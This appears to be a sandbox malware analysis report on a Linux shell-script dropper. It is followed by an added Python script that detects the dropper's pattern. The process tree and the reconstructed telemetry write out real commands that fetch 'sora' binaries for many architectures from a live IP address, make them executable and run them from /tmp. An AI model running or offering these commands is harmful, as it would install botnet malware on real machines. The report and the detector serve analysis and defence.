Analysis
max time kernel: 3s
max time network: 129s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 18/10/2024, 01:47
Static task
static1
Behavioral tasks
behavioral1: sample 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh, resource ubuntu1804-amd64-20240611-en
behavioral2: sample 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh, resource debian9-armhf-20240611-en
behavioral3: sample 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh, resource debian9-mipsbe-20240729-en
behavioral4: sample 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh, resource debian9-mipsel-20240611-en
General
Target: 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Size: 2KB
MD5: 891d1dcbed8ea0751d0c0d0fec39ae18
SHA1: 57db06f345b0d9b4e2a7f4a502678a82ed792174
SHA256: 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a
SHA512: 20efcebab56d13d819a5fc0f1cdaf5952ec218e8ad4a8ecad863b5ccbbbc60bf82ad7bedb67196ae51c9c0156fce1a2279013018268560331c3b436762ed2992
Malware Config
Signatures

File and Directory Permissions Modification (1 TTP, 14 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
pid   Process
1491  chmod
1497  chmod
1506  chmod
1512  chmod
1518  chmod
1524  chmod
1530  chmod
1536  chmod
1542  chmod
1548  chmod
1554  chmod
1560  chmod
1566  chmod
1572  chmod

Executes dropped EXE (14 IoCs)
ioc          pid   Process
/tmp/robben  1492  robben
/tmp/robben  1498  robben
/tmp/robben  1507  robben
/tmp/robben  1513  robben
/tmp/robben  1519  robben
/tmp/robben  1525  robben
/tmp/robben  1531  robben
/tmp/robben  1537  robben
/tmp/robben  1543  robben
/tmp/robben  1549  robben
/tmp/robben  1555  robben
/tmp/robben  1561  robben
/tmp/robben  1567  robben
/tmp/robben  1573  robben

System Network Configuration Discovery (1 TTP, 3 IoCs)
Adversaries may gather information about the network configuration of a system.
pid   Process
1494  wget
1495  curl
1496  cat

Writes file to tmp directory (1 IoC)
Malware often drops required files in the /tmp directory.
description                   ioc          Process
File opened for modification  /tmp/robben  5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Processes
Each entry is image path, command line, and PID; indented "-" lines are the signatures the sandbox attached to that process. The script is the only depth-1 process; every other entry was recorded at depth 2 beneath it.

/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh  /tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh  (PID 1486)
  - Writes file to tmp directory

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.x86  (PID 1487)
  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.x86  (PID 1489)
  /bin/cat  cat sora.x86  (PID 1490)
  /bin/chmod  chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3  (PID 1491)
    - File and Directory Permissions Modification
  /tmp/robben  ./robben jaws.exploit  (PID 1492)
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.mips  (PID 1494)
    - System Network Configuration Discovery
  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.mips  (PID 1495)
    - System Network Configuration Discovery
  /bin/cat  cat sora.mips  (PID 1496)
    - System Network Configuration Discovery
  /bin/chmod  chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3  (PID 1497)
    - File and Directory Permissions Modification
  /tmp/robben  ./robben jaws.exploit  (PID 1498)
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.x86_64  (PID 1500)
  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.x86_64  (PID 1504)
  /bin/cat  cat sora.x86_64  (PID 1505)
  /bin/chmod  chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3  (PID 1506)
    - File and Directory Permissions Modification
  /tmp/robben  ./robben jaws.exploit  (PID 1507)
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.i468  (PID 1509)
  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.i468  (PID 1510)
  /bin/cat  cat sora.i468  (PID 1511)
  /bin/chmod  chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3  (PID 1512)
    - File and Directory Permissions Modification
  /tmp/robben  ./robben jaws.exploit  (PID 1513)
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.i686  (PID 1515)
  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.i686  (PID 1516)
  /bin/cat  cat sora.i686  (PID 1517)
  /bin/chmod  chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3  (PID 1518)
    - File and Directory Permissions Modification
  /tmp/robben  ./robben jaws.exploit  (PID 1519)
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.mpsl  (PID 1521)
  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.mpsl  (PID 1522)
  /bin/cat  cat sora.mpsl  (PID 1523)
  /bin/chmod  chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3  (PID 1524)
    - File and Directory Permissions Modification
  /tmp/robben  ./robben jaws.exploit  (PID 1525)
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm4  (PID 1527)
  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm4  (PID 1528)
  /bin/cat  cat sora.arm4  (PID 1529)
  /bin/chmod  chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3  (PID 1530)
    - File and Directory Permissions Modification
  /tmp/robben  ./robben jaws.exploit  (PID 1531)
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm5  (PID 1533)
  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm5  (PID 1534)
  /bin/cat  cat sora.arm5  (PID 1535)
  /bin/chmod  chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3  (PID 1536)
    - File and Directory Permissions Modification
  /tmp/robben  ./robben jaws.exploit  (PID 1537)
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm6  (PID 1539)
  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm6  (PID 1540)
  /bin/cat  cat sora.arm6  (PID 1541)
  /bin/chmod  chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3  (PID 1542)
    - File and Directory Permissions Modification
  /tmp/robben  ./robben jaws.exploit  (PID 1543)
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm7  (PID 1545)
  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm7  (PID 1546)
  /bin/cat  cat sora.arm7  (PID 1547)
  /bin/chmod  chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3  (PID 1548)
    - File and Directory Permissions Modification
  /tmp/robben  ./robben jaws.exploit  (PID 1549)
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.ppc  (PID 1551)
  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.ppc  (PID 1552)
  /bin/cat  cat sora.ppc  (PID 1553)
  /bin/chmod  chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3  (PID 1554)
    - File and Directory Permissions Modification
  /tmp/robben  ./robben jaws.exploit  (PID 1555)
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.ppc440fp  (PID 1557)
  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.ppc440fp  (PID 1558)
  /bin/cat  cat sora.ppc440fp  (PID 1559)
  /bin/chmod  chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3  (PID 1560)
    - File and Directory Permissions Modification
  /tmp/robben  ./robben jaws.exploit  (PID 1561)
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.m68k  (PID 1563)
  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.m68k  (PID 1564)
  /bin/cat  cat sora.m68k  (PID 1565)
  /bin/chmod  chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3  (PID 1566)
    - File and Directory Permissions Modification
  /tmp/robben  ./robben jaws.exploit  (PID 1567)
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.sh4  (PID 1569)
  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.sh4  (PID 1570)
  /bin/cat  cat sora.sh4  (PID 1571)
  /bin/chmod  chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3  (PID 1572)
    - File and Directory Permissions Modification
  /tmp/robben  ./robben jaws.exploit  (PID 1573)
    - Executes dropped EXE
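The process tree above is the loader pattern a host detection should key on: a downloader (wget, then curl as fallback) fetching http://93.123.85.141/bins/sora.<arch>, a chmod +x over /tmp, then execution of /tmp/robben, repeated once per architecture. The report lists cat sora.<arch> with no redirect because the shell performs the redirection itself; the "File opened for modification /tmp/robben" entry attributed to the script process (PID 1486) is consistent with the fetched payload being written to /tmp/robben before ./robben jaws.exploit runs. The script below is an added example for this page, not the sandbox's own signature logic. It runs over simplified (pid, ppid, image, cmdline) records constructed from the tree, with these assumptions: PIDs are sequential placeholders rather than the report's exact values, every child is parented to PID 1486 (the report shows only nesting depth), and the chmod argument list is shortened to robben. It flags any parent whose children include a URL download, a chmod +x and an execution from a scratch directory, and collects the host and per-architecture payload names as indicators; a constructed benign curl-then-tar sequence is included to show the rule does not fire on an ordinary download.

```python
"""Flag a fetch -> chmod +x -> exec-from-/tmp dropper chain in process telemetry.

Added example for the sandbox report above; it is not the sandbox's own
detection logic. Records are constructed from the report's process tree in
simplified (pid, ppid, image, cmdline) form.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

HOST = "93.123.85.141"  # download host from the report
SCRIPT = "/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh"
# Per-architecture payload suffixes, in the order the report's 14 rounds fetch them.
ARCHES = ["x86", "mips", "x86_64", "i468", "i686", "mpsl", "arm4",
          "arm5", "arm6", "arm7", "ppc", "ppc440fp", "m68k", "sh4"]

URL_RE = re.compile(r"https?://\S+")
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
RAW_IP = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def build_events():
    """Constructed telemetry mirroring the report: one round per architecture.

    Assumptions: PIDs are sequential placeholders (the report's real PIDs have
    gaps), every child is parented to the script PID 1486 (the report shows
    only depth 2), and chmod's argument list is shortened to 'robben'.
    """
    events = [(1486, 1, SCRIPT, SCRIPT)]
    pid = 1487
    for arch in ARCHES:
        url = f"http://{HOST}/bins/sora.{arch}"
        for image, cmd in [("/usr/bin/wget", f"wget {url}"),
                           ("/usr/bin/curl", f"curl -O {url}"),
                           ("/bin/cat", f"cat sora.{arch}"),
                           ("/bin/chmod", "chmod +x robben"),
                           ("/tmp/robben", "./robben jaws.exploit")]:
            events.append((pid, 1486, image, cmd))
            pid += 1
    # Constructed benign activity: a download that is neither chmod'ed nor run from /tmp.
    events += [(3000, 1, "/bin/bash", "bash"),
               (3001, 3000, "/usr/bin/curl", "curl -O https://example.com/release.tar.gz"),
               (3002, 3000, "/bin/tar", "tar xzf release.tar.gz")]
    return events


@dataclass
class Finding:
    parent_pid: int
    hosts: set = field(default_factory=set)
    payloads: list = field(default_factory=list)  # distinct URL basenames, in order seen
    chmod_pids: list = field(default_factory=list)
    exec_images: set = field(default_factory=set)

    @property
    def severity(self):
        # Plain-http fetches from a bare IP plus several arch-suffixed payloads
        # under one parent is the architecture-sweeping loader pattern.
        sweep = len(self.payloads) >= 3
        bare_ip = any(RAW_IP.fullmatch(h) for h in self.hosts)
        return "high" if sweep and bare_ip else "medium"


def detect(events):
    """Return one Finding per parent whose children show all three stages."""
    by_parent = {}
    for pid, ppid, image, cmd in events:
        by_parent.setdefault(ppid, []).append((pid, image, cmd))
    findings = []
    for ppid, children in by_parent.items():
        f = Finding(parent_pid=ppid)
        for pid, image, cmd in children:
            name = image.rsplit("/", 1)[-1]
            if name in DOWNLOADERS:
                for url in URL_RE.findall(cmd):
                    u = urlparse(url)
                    f.hosts.add(u.hostname or "")
                    base = u.path.rsplit("/", 1)[-1]
                    if base and base not in f.payloads:
                        f.payloads.append(base)
            elif name == "chmod" and "+x" in cmd.split():
                f.chmod_pids.append(pid)
            elif image.startswith(SCRATCH_DIRS):
                f.exec_images.add(image)
        # Fetch, mark executable, and run from a scratch dir, all under one parent.
        if f.hosts and f.chmod_pids and f.exec_images:
            findings.append(f)
    return findings


def block_list(findings):
    """Distinct download hosts to hand to egress filtering, sorted."""
    return sorted({h for f in findings for h in f.hosts})


if __name__ == "__main__":
    for f in detect(build_events()):
        print(f"parent {f.parent_pid}: {f.severity}; hosts={sorted(f.hosts)}; "
              f"{len(f.payloads)} payloads starting {f.payloads[:3]}; "
              f"executed={sorted(f.exec_images)}")
```

Grouping by parent is what keeps the false-positive rate down: curl followed by tar under a shell is routine, and chmod +x on its own is routine, but a single parent that downloads, marks executable and then runs something out of /tmp is the shape of this sample regardless of which downloader, host or filename the next variant uses. On real EDR data the parent PID comes from the event stream rather than being assumed.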